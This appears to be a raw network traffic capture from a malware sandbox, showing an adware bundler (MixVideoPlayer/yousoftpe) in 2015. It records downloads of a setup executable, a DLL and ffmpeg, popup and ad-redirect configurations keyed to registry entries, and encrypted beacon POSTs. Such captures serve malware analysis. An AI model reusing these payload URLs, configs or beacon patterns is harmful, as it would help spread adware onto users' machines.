or: #999999;..scrollbar-3dlight-color: #333333;..scrollbar-shadow-colo
r: #333333;..scrollbar-darkshadow-color: #333333;..scrollbar-arrow-col
or: #CCCCCC;..scrollbar-track-color: #333333;.}...videupdater a, .vide
updater span {..color:#b5b5b5;.}...clear {..clear:both;..height:0px;..
overflow:inherit;..display: none;.}..li {..list-style: none;.}./******
***************//*********************//*********************//*******
**************//********./* estilo para poner los botones del box.html
 todos en display none */.._Bnext, .._Bexit, .._Bdecline, .._Bomit {..
/*display:none;*/.}./*************************************************
*/..container {..float:left;..width:555px;..height: 458px;..background
-color:#323333;..margin: 0 auto;.}../*****************Template Win_Lin
k*****************/......minimize {..float: right;..width: 45px;..posi
tion: relative;..margin-right: -45px;..right: 45px;..margin-top: 12px;
..z-index: 9999;.}....minimize ul li {..display: inline;..float: left;
.}...minimize li {....float: left;..}  ....minimize .button-min {..col
or: #636363;..text-decoration: none;..border: none;..font-size: 17
<<< skipped >>>

GET /?page=ec&a_aid=51ccedn87de7&pubid=415891&prgid=152873&cpnid=1208733&clickid=20Wzkj0hKoBMRsqv0Ggk9v1z11W5000.&ce_cid=20Wzkj0hKoBMRsqv0Ggk9v1z11W5000. HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.webtrackerplus.com

Connection: Keep-Alive

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Sat, 06 Jun 2015 00:26:06 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

location: hXXp://3p6.popularfastchannel.com/?s1=&s2=&s3=

Set-Cookie: SERVERID=web5; path=/

Set-Cookie: visid_incap_227739=oVdrpO2pS1WJl6aDrCoZzR0 clUAAAAAQUIPAAAAAABdFW8qAPL1FEbaM auxILz; expires=Sun, 04 Jun 2017 08:58:26 GMT; path=/; Domain=.webtrackerplus.com

Set-Cookie: incap_ses_323_227739=x6PtTy9u5WEwE2/p84Z7BB0 clUAAAAAJsFkeDKv4ZXzGHbWM71EFQ==; path=/; Domain=.webtrackerplus.com

Set-Cookie: ___utmvmFPupvfO=ZtWRQrIoebn; path=/; Max-Age=900

Set-Cookie: ___utmvaFPupvfO=Koo.wPNM; path=/; Max-Age=900

Set-Cookie: ___utmvbFPupvfO=hZd

    XmyOqali: ptI; path=/; Max-Age=900

X-Iinfo: 6-71821477-71821478 NNNN CT(117 -1 0) RT(1433550365070 8) q(0 0 1 0) r(3 3) U5

X-CDN: Incapsula
0..

GET /sdb/1d/MixVideoPlayerUpdate.xml?44812e3f-d43a-4eb7-8bef-8c0aefa2ce28 HTTP/1.1

Host: staticrr.mixvideoplayer.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 06 Jun 2015 00:26:41 GMT

Content-Type: text/xml

Content-Length: 671

Last-Modified: Fri, 05 Jun 2015 11:17:56 GMT

Connection: keep-alive

ETag: "55718564-29f"

Accept-Ranges: bytes
<?xml version="1.0" encoding="UTF-8"?>..<LastVersion>...&l
t;url>hXXp://staticrr.mixvideoplayer.com/sdb/84/MixVideoPlayerSetup
.exe</url>...<version>1.0.0.20</version>...<Track
Activity>true</TrackActivity>...<TrackErrors>true</T
rackErrors>...<vast active="true">....<adnum>3</adnu
m>....<adurl countries="US,RU,BR,MX,DE,FR,IN,GB,ES,TR,AR,IT,IL,J
P,CA,IR,AU,NL,ID,CO,PK">.....<![CDATA[hXXp://ads.adaptv.advertis
ing.com/a/h/fUUYX443fr3iHLf1b0DAy3MvZmqN m4YhR8Ql84ugxaUwnVer0nkAl4RaF
w4ippAh4iKfLnbLyk=?cb=[CACHE_BREAKER]&pageUrl=apps://mixvideop
layer.com&eov=eov]]>....</adurl>...</vast>...<Coll
ectorLTV>collector-pre.ltv-analytics.com:8080</CollectorLTV>.
.</LastVersion>HTTP/1.1 200 OK..Server: nginx..Date: Sat, 06 Jun
 2015 00:26:41 GMT..Content-Type: text/xml..Content-Length: 671..Last-
Modified: Fri, 05 Jun 2015 11:17:56 GMT..Connection: keep-alive..ETag:
 "55718564-29f"..Accept-Ranges: bytes..<?xml version="1.0" encoding
="UTF-8"?>..<LastVersion>...<url>hXXp://staticrr.mixvid
eoplayer.com/sdb/84/MixVideoPlayerSetup.exe</url>...<version&
gt;1.0.0.20</version>...<TrackActivity>true</TrackActiv
ity>...<TrackErrors>true</TrackErrors>...<vast activ
e="true">....<adnum>3</adnum>....<adurl countries="U
S,RU,BR,MX,DE,FR,IN,GB,ES,TR,AR,IT,IL,JP,CA,IR,AU,NL,ID,CO,PK">....
.<![CDATA[hXXp://ads.adaptv.advertising.com/a/h/fUUYX443fr3iHLf
<<< skipped >>>

GET /templates/_common/_templates/browser_survey_SMARTKEYS_MASTER_lightbox_UA/css/style-ie.css HTTP/1.1

Accept: */*

Referer: hXXp://asmzz.exclusiverewards.startree.science/?sov=73001201&hid=hljlntjxhrlrjrz&redid=10845&gsid=68&id=XNSX.-r10845-t68

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: asmzz.exclusiverewards.startree.science

Connection: Keep-Alive

Cookie: ci_session=xZprAEsUzrdEkX6CbrGXhhft/rFHoGKI5+XwEnsrw/UHP3QkX7eYHCgjPENvAfqx+2gfFYRGDY9RhjsMfhdPeddLnICtx/ySuLVBm+TTMp3JEd1yQOnzw5k4Gfqiuqu5Zf48gENlW4xApVM1kkLqPsTEj4cfeSfyOYq3Mq4Ie0+/G/iYROU1tbXakSVWerAv5B6gvaKB6VxBX8b/FtmEvP+tll3/qzP2aV1gisLlLEHNLVr9bIAukUB/pV1EwnGd5NCDfOeooNaSD0k7N4zH8NGS5WIKchU/DZmuvkr3MAKdE+1CN7nZ3dpQZaM02PlZD9bYXsrTGncl/kL/P3qaqFCEO2h4mM0JSFPgf6BsmHjCjP5f7qEQjdSXlds5hq+yMODKxDr3/0G4WNZQ3/rBNkWFunA0evJZSXGsTKLtme7Q43zJLSDBjs4/GoXbwdSBecmk4KkIqFxDTRPQZfALhg==; id=XNSX.-r10845-t68; SITE_ID=73001201; sov=73001201; mov=nr.ytsurvey.mini; redid=10845; gsid=68; URI=sov=73001201&hid=hljlntjxhrlrjrz&redid=10845&gsid=68&id=XNSX.-r10845-t68; templateid=2582; path=browser_survey_SMARTKEYS_MASTER_lightbox_UA; version=227198; tags[2582][expand_enable]=-1; tags[2582][alert_enable]=1; tags[2582][audio_enable]=0; tags[2582][pop_enable]=0; tags[227198][expand_enable]=-1; tags[227198][alert_enable]=1; tags[227198][audio_enable]=0
HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Sat, 06 Jun 2015 00:26:10 GMT

Content-Type: text/css

Last-Modified: Fri, 11 Oct 2013 18:30:44 GMT

Transfer-Encoding: chunked

Expires: Tue, 31 May 2016 00:26:10 GMT

Cache-Control: max-age=31104000

Pragma: public

Cache-Control: public, must-revalidate, proxy-revalidate

Content-Encoding: gzip
269.............S...0.=o.b....6!....;{.zh{GN.....:N...{'v`.......x..{.
...)...AT1..<......j...9L..5....E3.c..f.....F..g[..-Z.LxX.'.N..9<
;....m.`.....f.PI-*<..,..Kn.T.....V.zk.yn.[..Tuh.%,I.k..f<G$.V.l
.C7..B...1....r..z.#^b......e.A..\[email protected].:l$.i..s....w/:#Qu.`.<..
.....[A.4D{..V....*..=..;{.#..e..1.:8..I.e6.?....N....a.Qh.w.....~.-.h
...i.V..Y.Ai..wkD5.c..q=.v.....q....I......3......F...b*%......2..|p..
......d.-}.l.Q..M...8...Dc.\...y|........i..\./..N.L.......l.$.S.\.~&l
t;P`..[a..^.....hz....x..J.M.1}...2.c7.KrnE.oH.2^,...1....".......!9..
3.zi.^w.......7..`k=kdM7... ..N6........&?.Nt.U........./%g.L.....S.'.
..K.h.O.....0..HTTP/1.1 200 OK..Server: nginx/1.6.0..Date: Sat, 06 Jun
 2015 00:26:10 GMT..Content-Type: text/css..Last-Modified: Fri, 11 Oct
 2013 18:30:44 GMT..Transfer-Encoding: chunked..Expires: Tue, 31 May 2
016 00:26:10 GMT..Cache-Control: max-age=31104000..Pragma: public..Cac
he-Control: public, must-revalidate, proxy-revalidate..Content-Encodin
g: gzip..269.............S...0.=o.b....6!....;{.zh{GN.....:N...{'v`...
....x..{....)...AT1..<......j...9L..5....E3.c..f.....F..g[..-Z.LxX.
'.N..9<....m.`.....f.PI-*<..,..Kn.T.....V.zk.yn.[..Tuh.%,I.k..f&
lt;G$.V.l.C7..B...1....r..z.#^b......e.A..\[email protected].:l$.i..s....w/:#Qu
.`.<.......[A.4D{..V....*..=..;{.#..e..1.:8..I.e6.?....N....a.Qh.w.
....~.-.h...i.V..Y.Ai..wkD5.c..q=.v.....q....I......3......F...b*%....
..2..|p........d.-}.l.Q..M...8...Dc.\...y|........i..\./..N.L.......l.
$.S.\.~<P`..[a..^.....hz....x..J.M.1}...2.c7.KrnE.oH.2^,...1...
<<< skipped >>>

GET /ajax/libs/jquery/1.10.2/jquery.min.js HTTP/1.1

Accept: */*

Referer: hXXp://asmzz.exclusiverewards.startree.science/?sov=73001201&hid=hljlntjxhrlrjrz&redid=10845&gsid=68&id=XNSX.-r10845-t68

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: ajax.googleapis.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/javascript; charset=UTF-8

Last-Modified: Tue, 09 Jul 2013 11:31:25 GMT

Date: Tue, 02 Jun 2015 18:01:26 GMT

Expires: Wed, 01 Jun 2016 18:01:26 GMT

Access-Control-Allow-Origin: *

Timing-Allow-Origin: *

X-Content-Type-Options: nosniff

Server: sffe

Content-Length: 32822

X-XSS-Protection: 1; mode=block

Cache-Control: public, max-age=31536000

Age: 282283

Alternate-Protocol: 80:quic,p=0
.............{...0.{....U.sD.N...3.u.4i.8....h?..J.A..@-....;.lX(.....
.i-b..z.ls....._.......d4.....G.28z2......S..e..VQ...8.:[.......Q^\...
2.......}T..b...m.Iv....HUn.d.M.....?..]....XT..uT.e......q.>.D..Q.
/...nV.r...J.227/....P..)vp.H,..^l.|!....yb%..e.A.......J\.E.....J.U|.
.Z....._W..@\..UT~...*.m\Tw.B.G.r#nes$E\...(.o.nG..*L*|#.`/n..|x.....|
..|T...!.....z..up:...o.......x&O......../_..>./.u.......a..c......
...Y0.{.x\....'..A..T..r_..7........./.O.'g5.~A.-Dx.?/....ky.E..a-.n.|
.`..B..q.......: .E.................U.z..X.8.....*vq...2..]..'<%..S
r).C.N6....F.......x.........i...,*c...7.\p.G.h.zq...MRVq..u..y.....BH
...|.M.*.........*.............4..6..w...X.&....}....>....A.......$
.q.q.#..B.s.W.....^.Q.J...*..c(.U.J.J..S.Ty;..y....=o.p-`...X.*/.[...:
s.[..n".i...q...*)..W....S..&..'...g..X<..1L.w.x..?........7g....AF
@...........T....$....8S..du..x43.n.`..=..C.......w.s......(.RQ.......
x.f......}..n.QQ._.....Rd..Q...70.Y6.o`.. ....#1...x?.......oGI.*.....
_.e.].....:p......}lv.,....3..QEU...z2uVd...../c.8...z..?Y."?>.q...
;.7.=.%[email protected]~........q..\...u......LW.....ac>.`V
..........W.W[..K.h0.W..7...iQDw>..[\..z....cQ.T,tv....h..)5.......
.......Vr....p|.........x./.....\.|....c%][email protected].^..j/[email protected]
/....;...|/h..F..%..M.H..y...%p.D.{..:c.._...H......ME..N..:TA.....H..
.......3..:[email protected]...........
lup..J.u......P..(...~..W.[Z.....0|.C1....X.....v...HDC....2rz.`..5pl)
l..}.g{)..)bB."..8.,A)ao/e..l. {../.A;..u.q.A].%....,e.....NN.`.;K
<<< skipped >>>

GET /ads?key=5d7c4c519bcd79cc1dca058af3cfebbc&width=0&height=0 HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: n149adserv.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

Cache-Control: no-cache

Pragma: no-cache

Expires: Thu, 01 Jan 1970 00:00:00 GMT

P3P: CP="CAO PSA OUR"

Set-Cookie: epomUUID=9d806520-0be2-11e5-8e44-f8bc125381b8; Domain=.n149adserv.com; Expires=Fri, 01-Jun-2035 00:26:03 GMT; Path=/

Set-Cookie: ep_5d7c4c519bcd79cc1dca058af3cfebbc=1433550363763|579; Domain=.n149adserv.com; Expires=Sun, 07-Jun-2015 00:26:03 GMT; Path=/

Content-Type: text/html;charset=UTF-8

Content-Length: 966

Date: Sat, 06 Jun 2015 00:26:02 GMT
<html><head><!--579:53--></head><body leftm
argin='0' topmargin='0' marginwidth='0' marginheight='0' style='backgr
ound-color:transparent; width: 100%; text-align: center;'><meta 
http-equiv="refresh" content="0; url=hXXp://network.adsmarket.com/clic
k/jGJunWecqZmPY2mWYcp6w4iQa5tnnH6Wi2SYmGakfZSJkGqaYKOBl7dia5Vmon2X?dp=
NTN8NTc5fFVBfDF8MXx8|34ee69d9819b5a94df7268d81470e3f3-17-62|9d806520-0
be2-11e5-8e44-f8bc125381b8" /><script type="text/javascript">
var params = {}; var res = []; if (localStorage!==null && typeof local
Storage!==null && typeof localStorage != "undefined" &&  typeof localS
torage.epomCookies != "undefined") params = JSON.parse(localStorage.ep
omCookies); for (var p in params) res.push(p   "="   params[p]);new Im
age().src = "hXXp://n149adserv.com" "/im" "pressi" "on.gif?b=579" "&p=
53&ch=&ap=&cps=&c" "=62&l=UA" "&h=2ce0467e4efaca9f0a762ccd5280ba2d&t="
 new Date().getTime() "&s=f312f1562460e629fdc063bb064533f4&" res.join(
'&');</script></body></html>..
<<< skipped >>>

GET /sdb/df/ffmpeg.zip HTTP/1.0

Host: staticrr.mixvideoplayer.com

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 06 Jun 2015 00:26:20 GMT

Content-Type: application/zip

Content-Length: 10143125

Last-Modified: Thu, 21 May 2015 14:48:35 GMT

Connection: close

ETag: "555df043-9ac595"

Accept-Ranges: bytes
PK........o..F=........X}.....ffmpeg.exe..}`T..?|o...Vo...D.ukc......]
H..Q#.....E..*.F......uX...Z....P..W._..XP..........E..^.9.3s.-..{~..O
Z.wg...9s.......6-S.4....j.bM.y.#....G...h....8u.^..Sk&.45...........?
7.r........{.-.7.._q...?.:...G...VuT...*..u^v.(..-...O.8A..q.V3M.~..m.
..l.......3$...O.[.G..W...gj^.....'[.dk..S.........{..4.o7....I.....nl
..s....lzA_c........'.....g/..}_J..A...W..>.v.....5m........O.....V
...)%.h..*z.o.....S....D........{.l.iH.......R. j.X>.....g.........
.e...]...............~:^Bo........>....pg.z....t...I..H............
..x.. .~.W.v..H./..>.u.F......RI.f........m..7iA...A....K.-..5....(
.Y..AM..E.....3.T.?...S.af[]..5...O..u..=...yv7.4.......'...e.Y.R..Y..
.o.-..W.Nl..O.].G....../[email protected]..@!...
,...~E)...x..o..C.....<3....[.....Y.n....2T.....#.}@.a.C>.....l.
...\.....u....|.(8a>d.8.....Q..Cr.^.9...@f..."..%...x...s;(........
.loX7..~y6..u#.%...S...PI/...D.d...~.7.......:.j...X C..~F.Q ....HXt.*
-.?..$..tK.....u...u....6...z..{..vj..Oh.......|.k.....Z..K...]7..n...
l...w.-{.mT..i.P.x.....&....o..tq.....N7..X....E...gS..0..9f.I.;.:...`
..........A..$..( [email protected]....'....s;...q;..]..._;.a...g..ma......:
..m......f.|.....N....3..../.q..P.kA6=..j..I.....,.!ji>rB7......U..
..-&..\....Q..).27..=.................... ...4...z.E.[..p:#?..F..w...'
8".R.,. .....P..u.=.<.P...../.J...%6....._..<..&#.'.......?....o
...Xpc...[..\.d.X=..E(-..8(.x s4.P...y.....z__*.:.......l~{mG[.....p.P
qW...X.zQ...... ...5..6.....)./...:...#._......oH.?...7..G.;<.-
<<< skipped >>>

GET /sdb/e0/WebBrowser.xml?d9db319c-edf4-4c23-ae40-ba3c3738dc0f HTTP/1.1

Host: staticrr.mixvideoplayer.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 06 Jun 2015 00:26:48 GMT

Content-Type: text/xml

Content-Length: 4250

Last-Modified: Mon, 18 May 2015 14:02:05 GMT

Connection: keep-alive

ETag: "5559f0dd-109a"

Accept-Ranges: bytes
<Popup>..<Version>1.0.0.10</Version>.    <Enabled
>true</Enabled>..<Size height="768" width="1000"/>.    
<FrecuencyPerHour>3</FrecuencyPerHour>.    <MaxWindows&
gt;4</MaxWindows>.    <LaunchDate>07/01/2015</LaunchDat
e>.    <Url container="popup">hXXp://VVV.wbredirect.com</U
rl>..<UrlNotAllowedCountries countries="AE,IR,IL,EG,CN,BA,RS,TH,
IN,CZ,ID,VN,PH,PK" container="popup">hXXp://network.adsmarket.com/c
lick/jGJunWecqZmOZnCXYcp6w4iQa5xgn36bi2SYm2Gif5mJkGqXXpt-lbdia5hhn3qX&
lt;/UrlNotAllowedCountries>.    <UrlByRegister>...<Url con
tainer="browser" key="HKLM\SOFTWARE" priority="5"><![CDATA[http:
//n149adserv.com/ads?key=8a35d9a5b93c671dcef88419ab81871b&width=0&heig
ht=0]]></Url>...<Url container="browser" key="HKLM\SOFTWAR
E\Microsoft\Windows\CurrentVersion\Uninstall\TeamSpeak 3 Client" prior
ity="5"><![CDATA[hXXp://n149adserv.com/ads?key=0d8448124f556ffce
ee148f60ea374f6&width=0&height=0]]></Url>...<Url container
="browser" key="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninsta
ll\RaidCall" priority="5"><![CDATA[hXXp://n149adserv.com/ads?key
=0d8448124f556ffceee148f60ea374f6&width=0&height=0]]></Url>..
.<Url container="browser" key="HKLM\SOFTWARE\Microsoft\Windows\Curr
entVersion\Uninstall\{EEB3F6BB-318D-4CE5-989F-8191FCBFB578}" priority=
"5"><![CDATA[hXXp://n149adserv.com/ads?key=0d8448124f556ffceee14
8f60ea374f6&width=0&height=0]]></Url>...<Url container
<<< skipped >>>

GET /d5/msjava.dll HTTP/1.1

Accept: */*

Proxy-Authorization: Basic 

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36

Host: static.api.yousoftpe.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 06 Jun 2015 00:25:48 GMT

Content-Type: application/octet-stream

Content-Length: 940304

Connection: keep-alive

Last-Modified: Thu, 26 Feb 2015 12:10:04 GMT

ETag: "54ef0d1c-e5910"

Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L.....C8
...........#...............................k..........................
......m...............................`#..te..........................
......................................................................
...........................text............................... ..`.dat
a...d"......."[email protected].............................
..@[email protected][email protected]@...0[.8M..... 8W...
4.D8a...4.D8l...6.D8y...5.D8............KERNEL32.dll.NTDLL.DLL.GDI32.d
ll.USER32.dll.ADVAPI32.dll.OLEAUT32.dll.ole32.dll.....................
......................................................................
......................................................................
......................................................................
......................................................................
............................................ .........................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>

GET /BesH3gE9/pop-up/ HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.yousoftpe.com

Connection: Keep-Alive

HTTP/1.1 301 Moved Permanently

Server: nginx

Date: Sat, 06 Jun 2015 00:26:04 GMT

Content-Type: text/html

Content-Length: 178

Connection: keep-alive

Location: hXXp://n149adserv.com/ads?key=5d7c4c519bcd79cc1dca058af3cfebbc&width=0&height=0
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx</center>..</body>..</html>..HTTP/1.1 301
 Moved Permanently..Server: nginx..Date: Sat, 06 Jun 2015 00:26:04 GMT
..Content-Type: text/html..Content-Length: 178..Connection: keep-alive
..Location: hXXp://n149adserv.com/ads?key=5d7c4c519bcd79cc1dca058af3cf
ebbc&width=0&height=0..<html>..<head><title>301 Move
d Permanently</title></head>..<body bgcolor="white">
..<center><h1>301 Moved Permanently</h1></center&
gt;..<hr><center>nginx</center>..</body>..<
/html>....

GET /__maxpower__/render_template/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab?language_code=en HTTP/1.1

Accept: */*

Proxy-Authorization: Basic 

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36

Host: api.yousoftpe.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 06 Jun 2015 00:25:59 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 2387

Connection: keep-alive

Vary: Accept-Language

Content-Language: en

Accept-Ranges: bytes
..<!--Template VideoUpdater-->..<div class="container">.&l
t;div class="videupdater">. <div class="minimize">.  <ul&g
t;.    <li><span onclick="minimizeWindow();" class="button-mi
n">-</span></li>.    <li><span id="_Bexit" onc
lick="onExit()" class="button-min">x</span></li>.  <
/ul>.</div>..<div id="_frameContainer" class="content">
..  ..</div>...<!-- buttons -->.<div class="buttons">
;..  <!--botones derecha -->.  .  <input id="_Bnext" class="_
Bnext grey right" buttonText="Next" tabindex="0" type="submit" value="
Next »" onclick='onAccept();'>.  ..  <!--botones izquierda
 -->..  .  <input id="_Bomit" class="_Bomit normal-close leftnow
idth" tabindex="3" type="submit" name="nombre" value="Skip All" onclic
k='onOmit();'>.  .  .  <input id="_Bdecline" class="_Bdecline no
rmal-close leftnowidth" tabindex="1" type="submit"  name="nombre" valu
e="Decline"  onclick='onDecline();'>.  ..  <div class="clear">
;</div>.</div>..  ..<div class="contact">.  <div 
class="contact-in" style="height: 20px;">..    <ul>.      <
;li><a target='_blank' class="first _TitPrivacy">Privacy Poli
cy</a></li>.      <li><a target='_blank' class="_
TitSetup">Setup info</a></li>.      <li><a tar
get='_blank' class="_TitFree">Why is this free?</a></li>
;.      <li><a target='_blank' class="_TitHelp">Help&l
<<< skipped >>>

GET /ded3de8ff3bf627ff6d83ea047844f0e91a95b1e757f4fb79ebb72e5215a43a3f1881186e28a14e9dcb327b6a4c44792123f9c4262bdb9bd14978d4785a634ebd1ab2fad42c3ac69be4103bbb5ace2eb9d729a9f30d3fd91 HTTP/1.1

Accept: */*

Proxy-Authorization: Basic 

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36

Host: api.yousoftpe.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 06 Jun 2015 00:25:56 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive
eec..a9151e171b57af8a9c6a8f057c0914b72fd0cf43c71aa61975bc4060f9e1d6854
c5f9e0168df8ee947bfd7845c5a3457b7e38c6a977f45d6f11d02da8cd261fbf3a677e
5d44995535d3ebfe54c24ae2c13d7baf1d761605e65bd52b903c9fb1f48308683874bf
44d8aa655e266f7a82e8f4cda70f13418ceefec59a321b37d68b96dd49e0c90e97d0ab
e397b8cacb105f5daa6cb866bbef0a1511c17ff62e45161c6f7c61b1a2a9940f483bfa
ccd522594a7e066616fe62a160420ad8ccdaadaf18683b303dede3a3c6f52207d8b0e5
8093aae5e504720b300887e7ba08a2aee930808a6e909d1458b7d6931fb2641a950dd0
fd65c55aecd05a73df33e5c4f5baecd72890902d425821a76f020f0113ea85e959ed6c
a48974929ff2d37a0b4e39286a1911da1695327285f3ed432995c0c8d3da8ffd5ae7b1
527475e04622bb48ed250449b60f826b7b74014b6e2ab32c9065f7a02e40d7ff2432a6
caf1f8b5e9ef63141dc72082e82129368f99a5257c7caf28eb0e0b19d3fde3cd8958c0
aa995ca88f05bc1448c5a05a8e14e3a0574416511e4a900854d35908492fa20fe098f1
c4f44da011a64e30e45158bc2dbb5bdd332c6462519c600edb0d3f53953c0c21a6a9ca
839100cc86ef3dfc40cf165754bbbb3fa2b663967158b839261c45dd09b5f91c854f00
6c4d419d2d308c1c0f407512253b9273ec75cbb54daddcc28038db49cc3293c261b458
c27614abf132a075cdd336916577ff64d00ad91b89cf13b3c6845826f2c5ade6dedaaf
2e017a82aa85e5fe717131977a393845543a40209d0ae9f6004724c8868ea4a84c722c
005bb3544798fd76786f2c14a5562e70887eb31aa1a40f15b5294f303f4486d213a99b
d6c004667a41df3eff0be47044d7f153ba49f77772735172e6a7d864df647f2157baae
c484c784e789413f8f8e9a845c12a023df26b529fae5a575585e3e13891ca8f017aaa3
4e63cbbcf8f28a6914df2268a4c70d01f0647717c1485e812fb2245757710e836170ff
03745053285728474789a7a400434390d825da563460f2358b58b84f2fc70af124
<<< skipped >>>

POST /bf347a9c266220e0e770ae69b02713632b85a487869a70dd771b22fb58989f9aa3ebc8497ffa6be434bb903bf4e644ccef8f18175e98e50b HTTP/1.1

User-Agent: dBrowser 1 CallGetResponse:1

Host: api.yousoftpe.com

Content-Length: 2726

Cache-Control: no-cache

cdata=86394263D6DED7AD3ED013DFEF7E64F6C29F5997166EF97A418F915F82A9AD7FC77F5FC74ED02F99799278738B97993DFA484DED0643C147AF1F76E6047AAC12B04F4D1B9014C49B2B9206253F7B816F613C3C2381141BF9CF3270815E833E217C84153888AF84AD3B25072B7234318ADB6B796AA64B779F2A2FFAABF95EFDC11241AEEFDE629155B76CCA2A4F117755C06DE1498E9C37CD98B521F0FD403F13CB01AF0E4FBF71138F6A88730187FF335D1D49628715144B0C70D3E9EFE7F238A0BD4DC3850AA17491D1411F679F649D153C8BB58D807D75C71D684597E3C53158883877E2B2DF5F9835210215BF8B4E424D54C9DC1B0382804C82DF6DE430D6286F4EC32EFA9C0879E0B5195F873EC93EFD9028384F794BA8001AAD0EFD2F57163951F48C0543140FA71C2CC25B1E684F083496E91153CD0189459D14D516740D975556EED463D549149C64F7817B04107DF3BD3AADB9D05FF4CA61C16FFA52B0B03FC804758BA2BBFE11F6894C15F67736AE213BCEFDF4413BB9970F70654B7C300116460FAB905A38A5DA3C219D77E5831422B475F8B98F771450C586E4A98C88422A4D2D55FEBEE8C1F50ED3ADDFD386B54BF360ED09327D06513E427FC52942CDABED860F111BDC58F37DAE1E5804B1D324B29777FFAC9632ED0D917F4E2248AF23B7B71F695AF748841602CCAB4C9C1AE20FB19194BE091E0473A3F10155839159F39D6F3E214794CCBA7519CA5A4640C97FFA3822F34CD7DECFE5253E6F5174F71615E7B4A511A96AE360D51CD33B6E803EC4587E00F7ABA679F9E761A3A25D92E107FEB662888D7119708C2ADF11E2F8B0966F45D228EF5963AC1CC6D27AA0644310EAA5088161C2C7E149BED5C76FB36C5CD2587FD058855B0D9BA3ADAED
HTTP/1.1 200 OK

Server: nginx

Date: Sat, 06 Jun 2015 00:25:58 GMT

Content-Type: text/plain

Transfer-Encoding: chunked

Connection: keep-alive
7..MAXTHX...0......

GET /maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/loading-install.gif HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: api.yousoftpe.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 06 Jun 2015 00:26:00 GMT

Content-Type: image/gif

Content-Length: 7928

Last-Modified: Fri, 27 Feb 2015 14:06:59 GMT

Connection: keep-alive

ETag: "54f07a03-1ef8"

Accept-Ranges: bytes
GIF89a..........DCD...:::.........qqq............555...zzziii}}}......
.........aaaQQQeee...%%%.........VVV...lll...............,,,...YYY...)
))...uuuJJJNNN!"!...]]]...101.................................\[\.....
....#$#KLK.../0/KKK[\[`_`...GGG'''...???............///......ccc...sss
ddd```...###.........SSS...777...VVV...888...xxx...............{|{{{{g
hg............kmk444XXX......OOOWWW...222...333!..NETSCAPE2.0.....!..X
MP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> 
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c01
1 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="h
ttp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rd
f:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http:
//ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/s
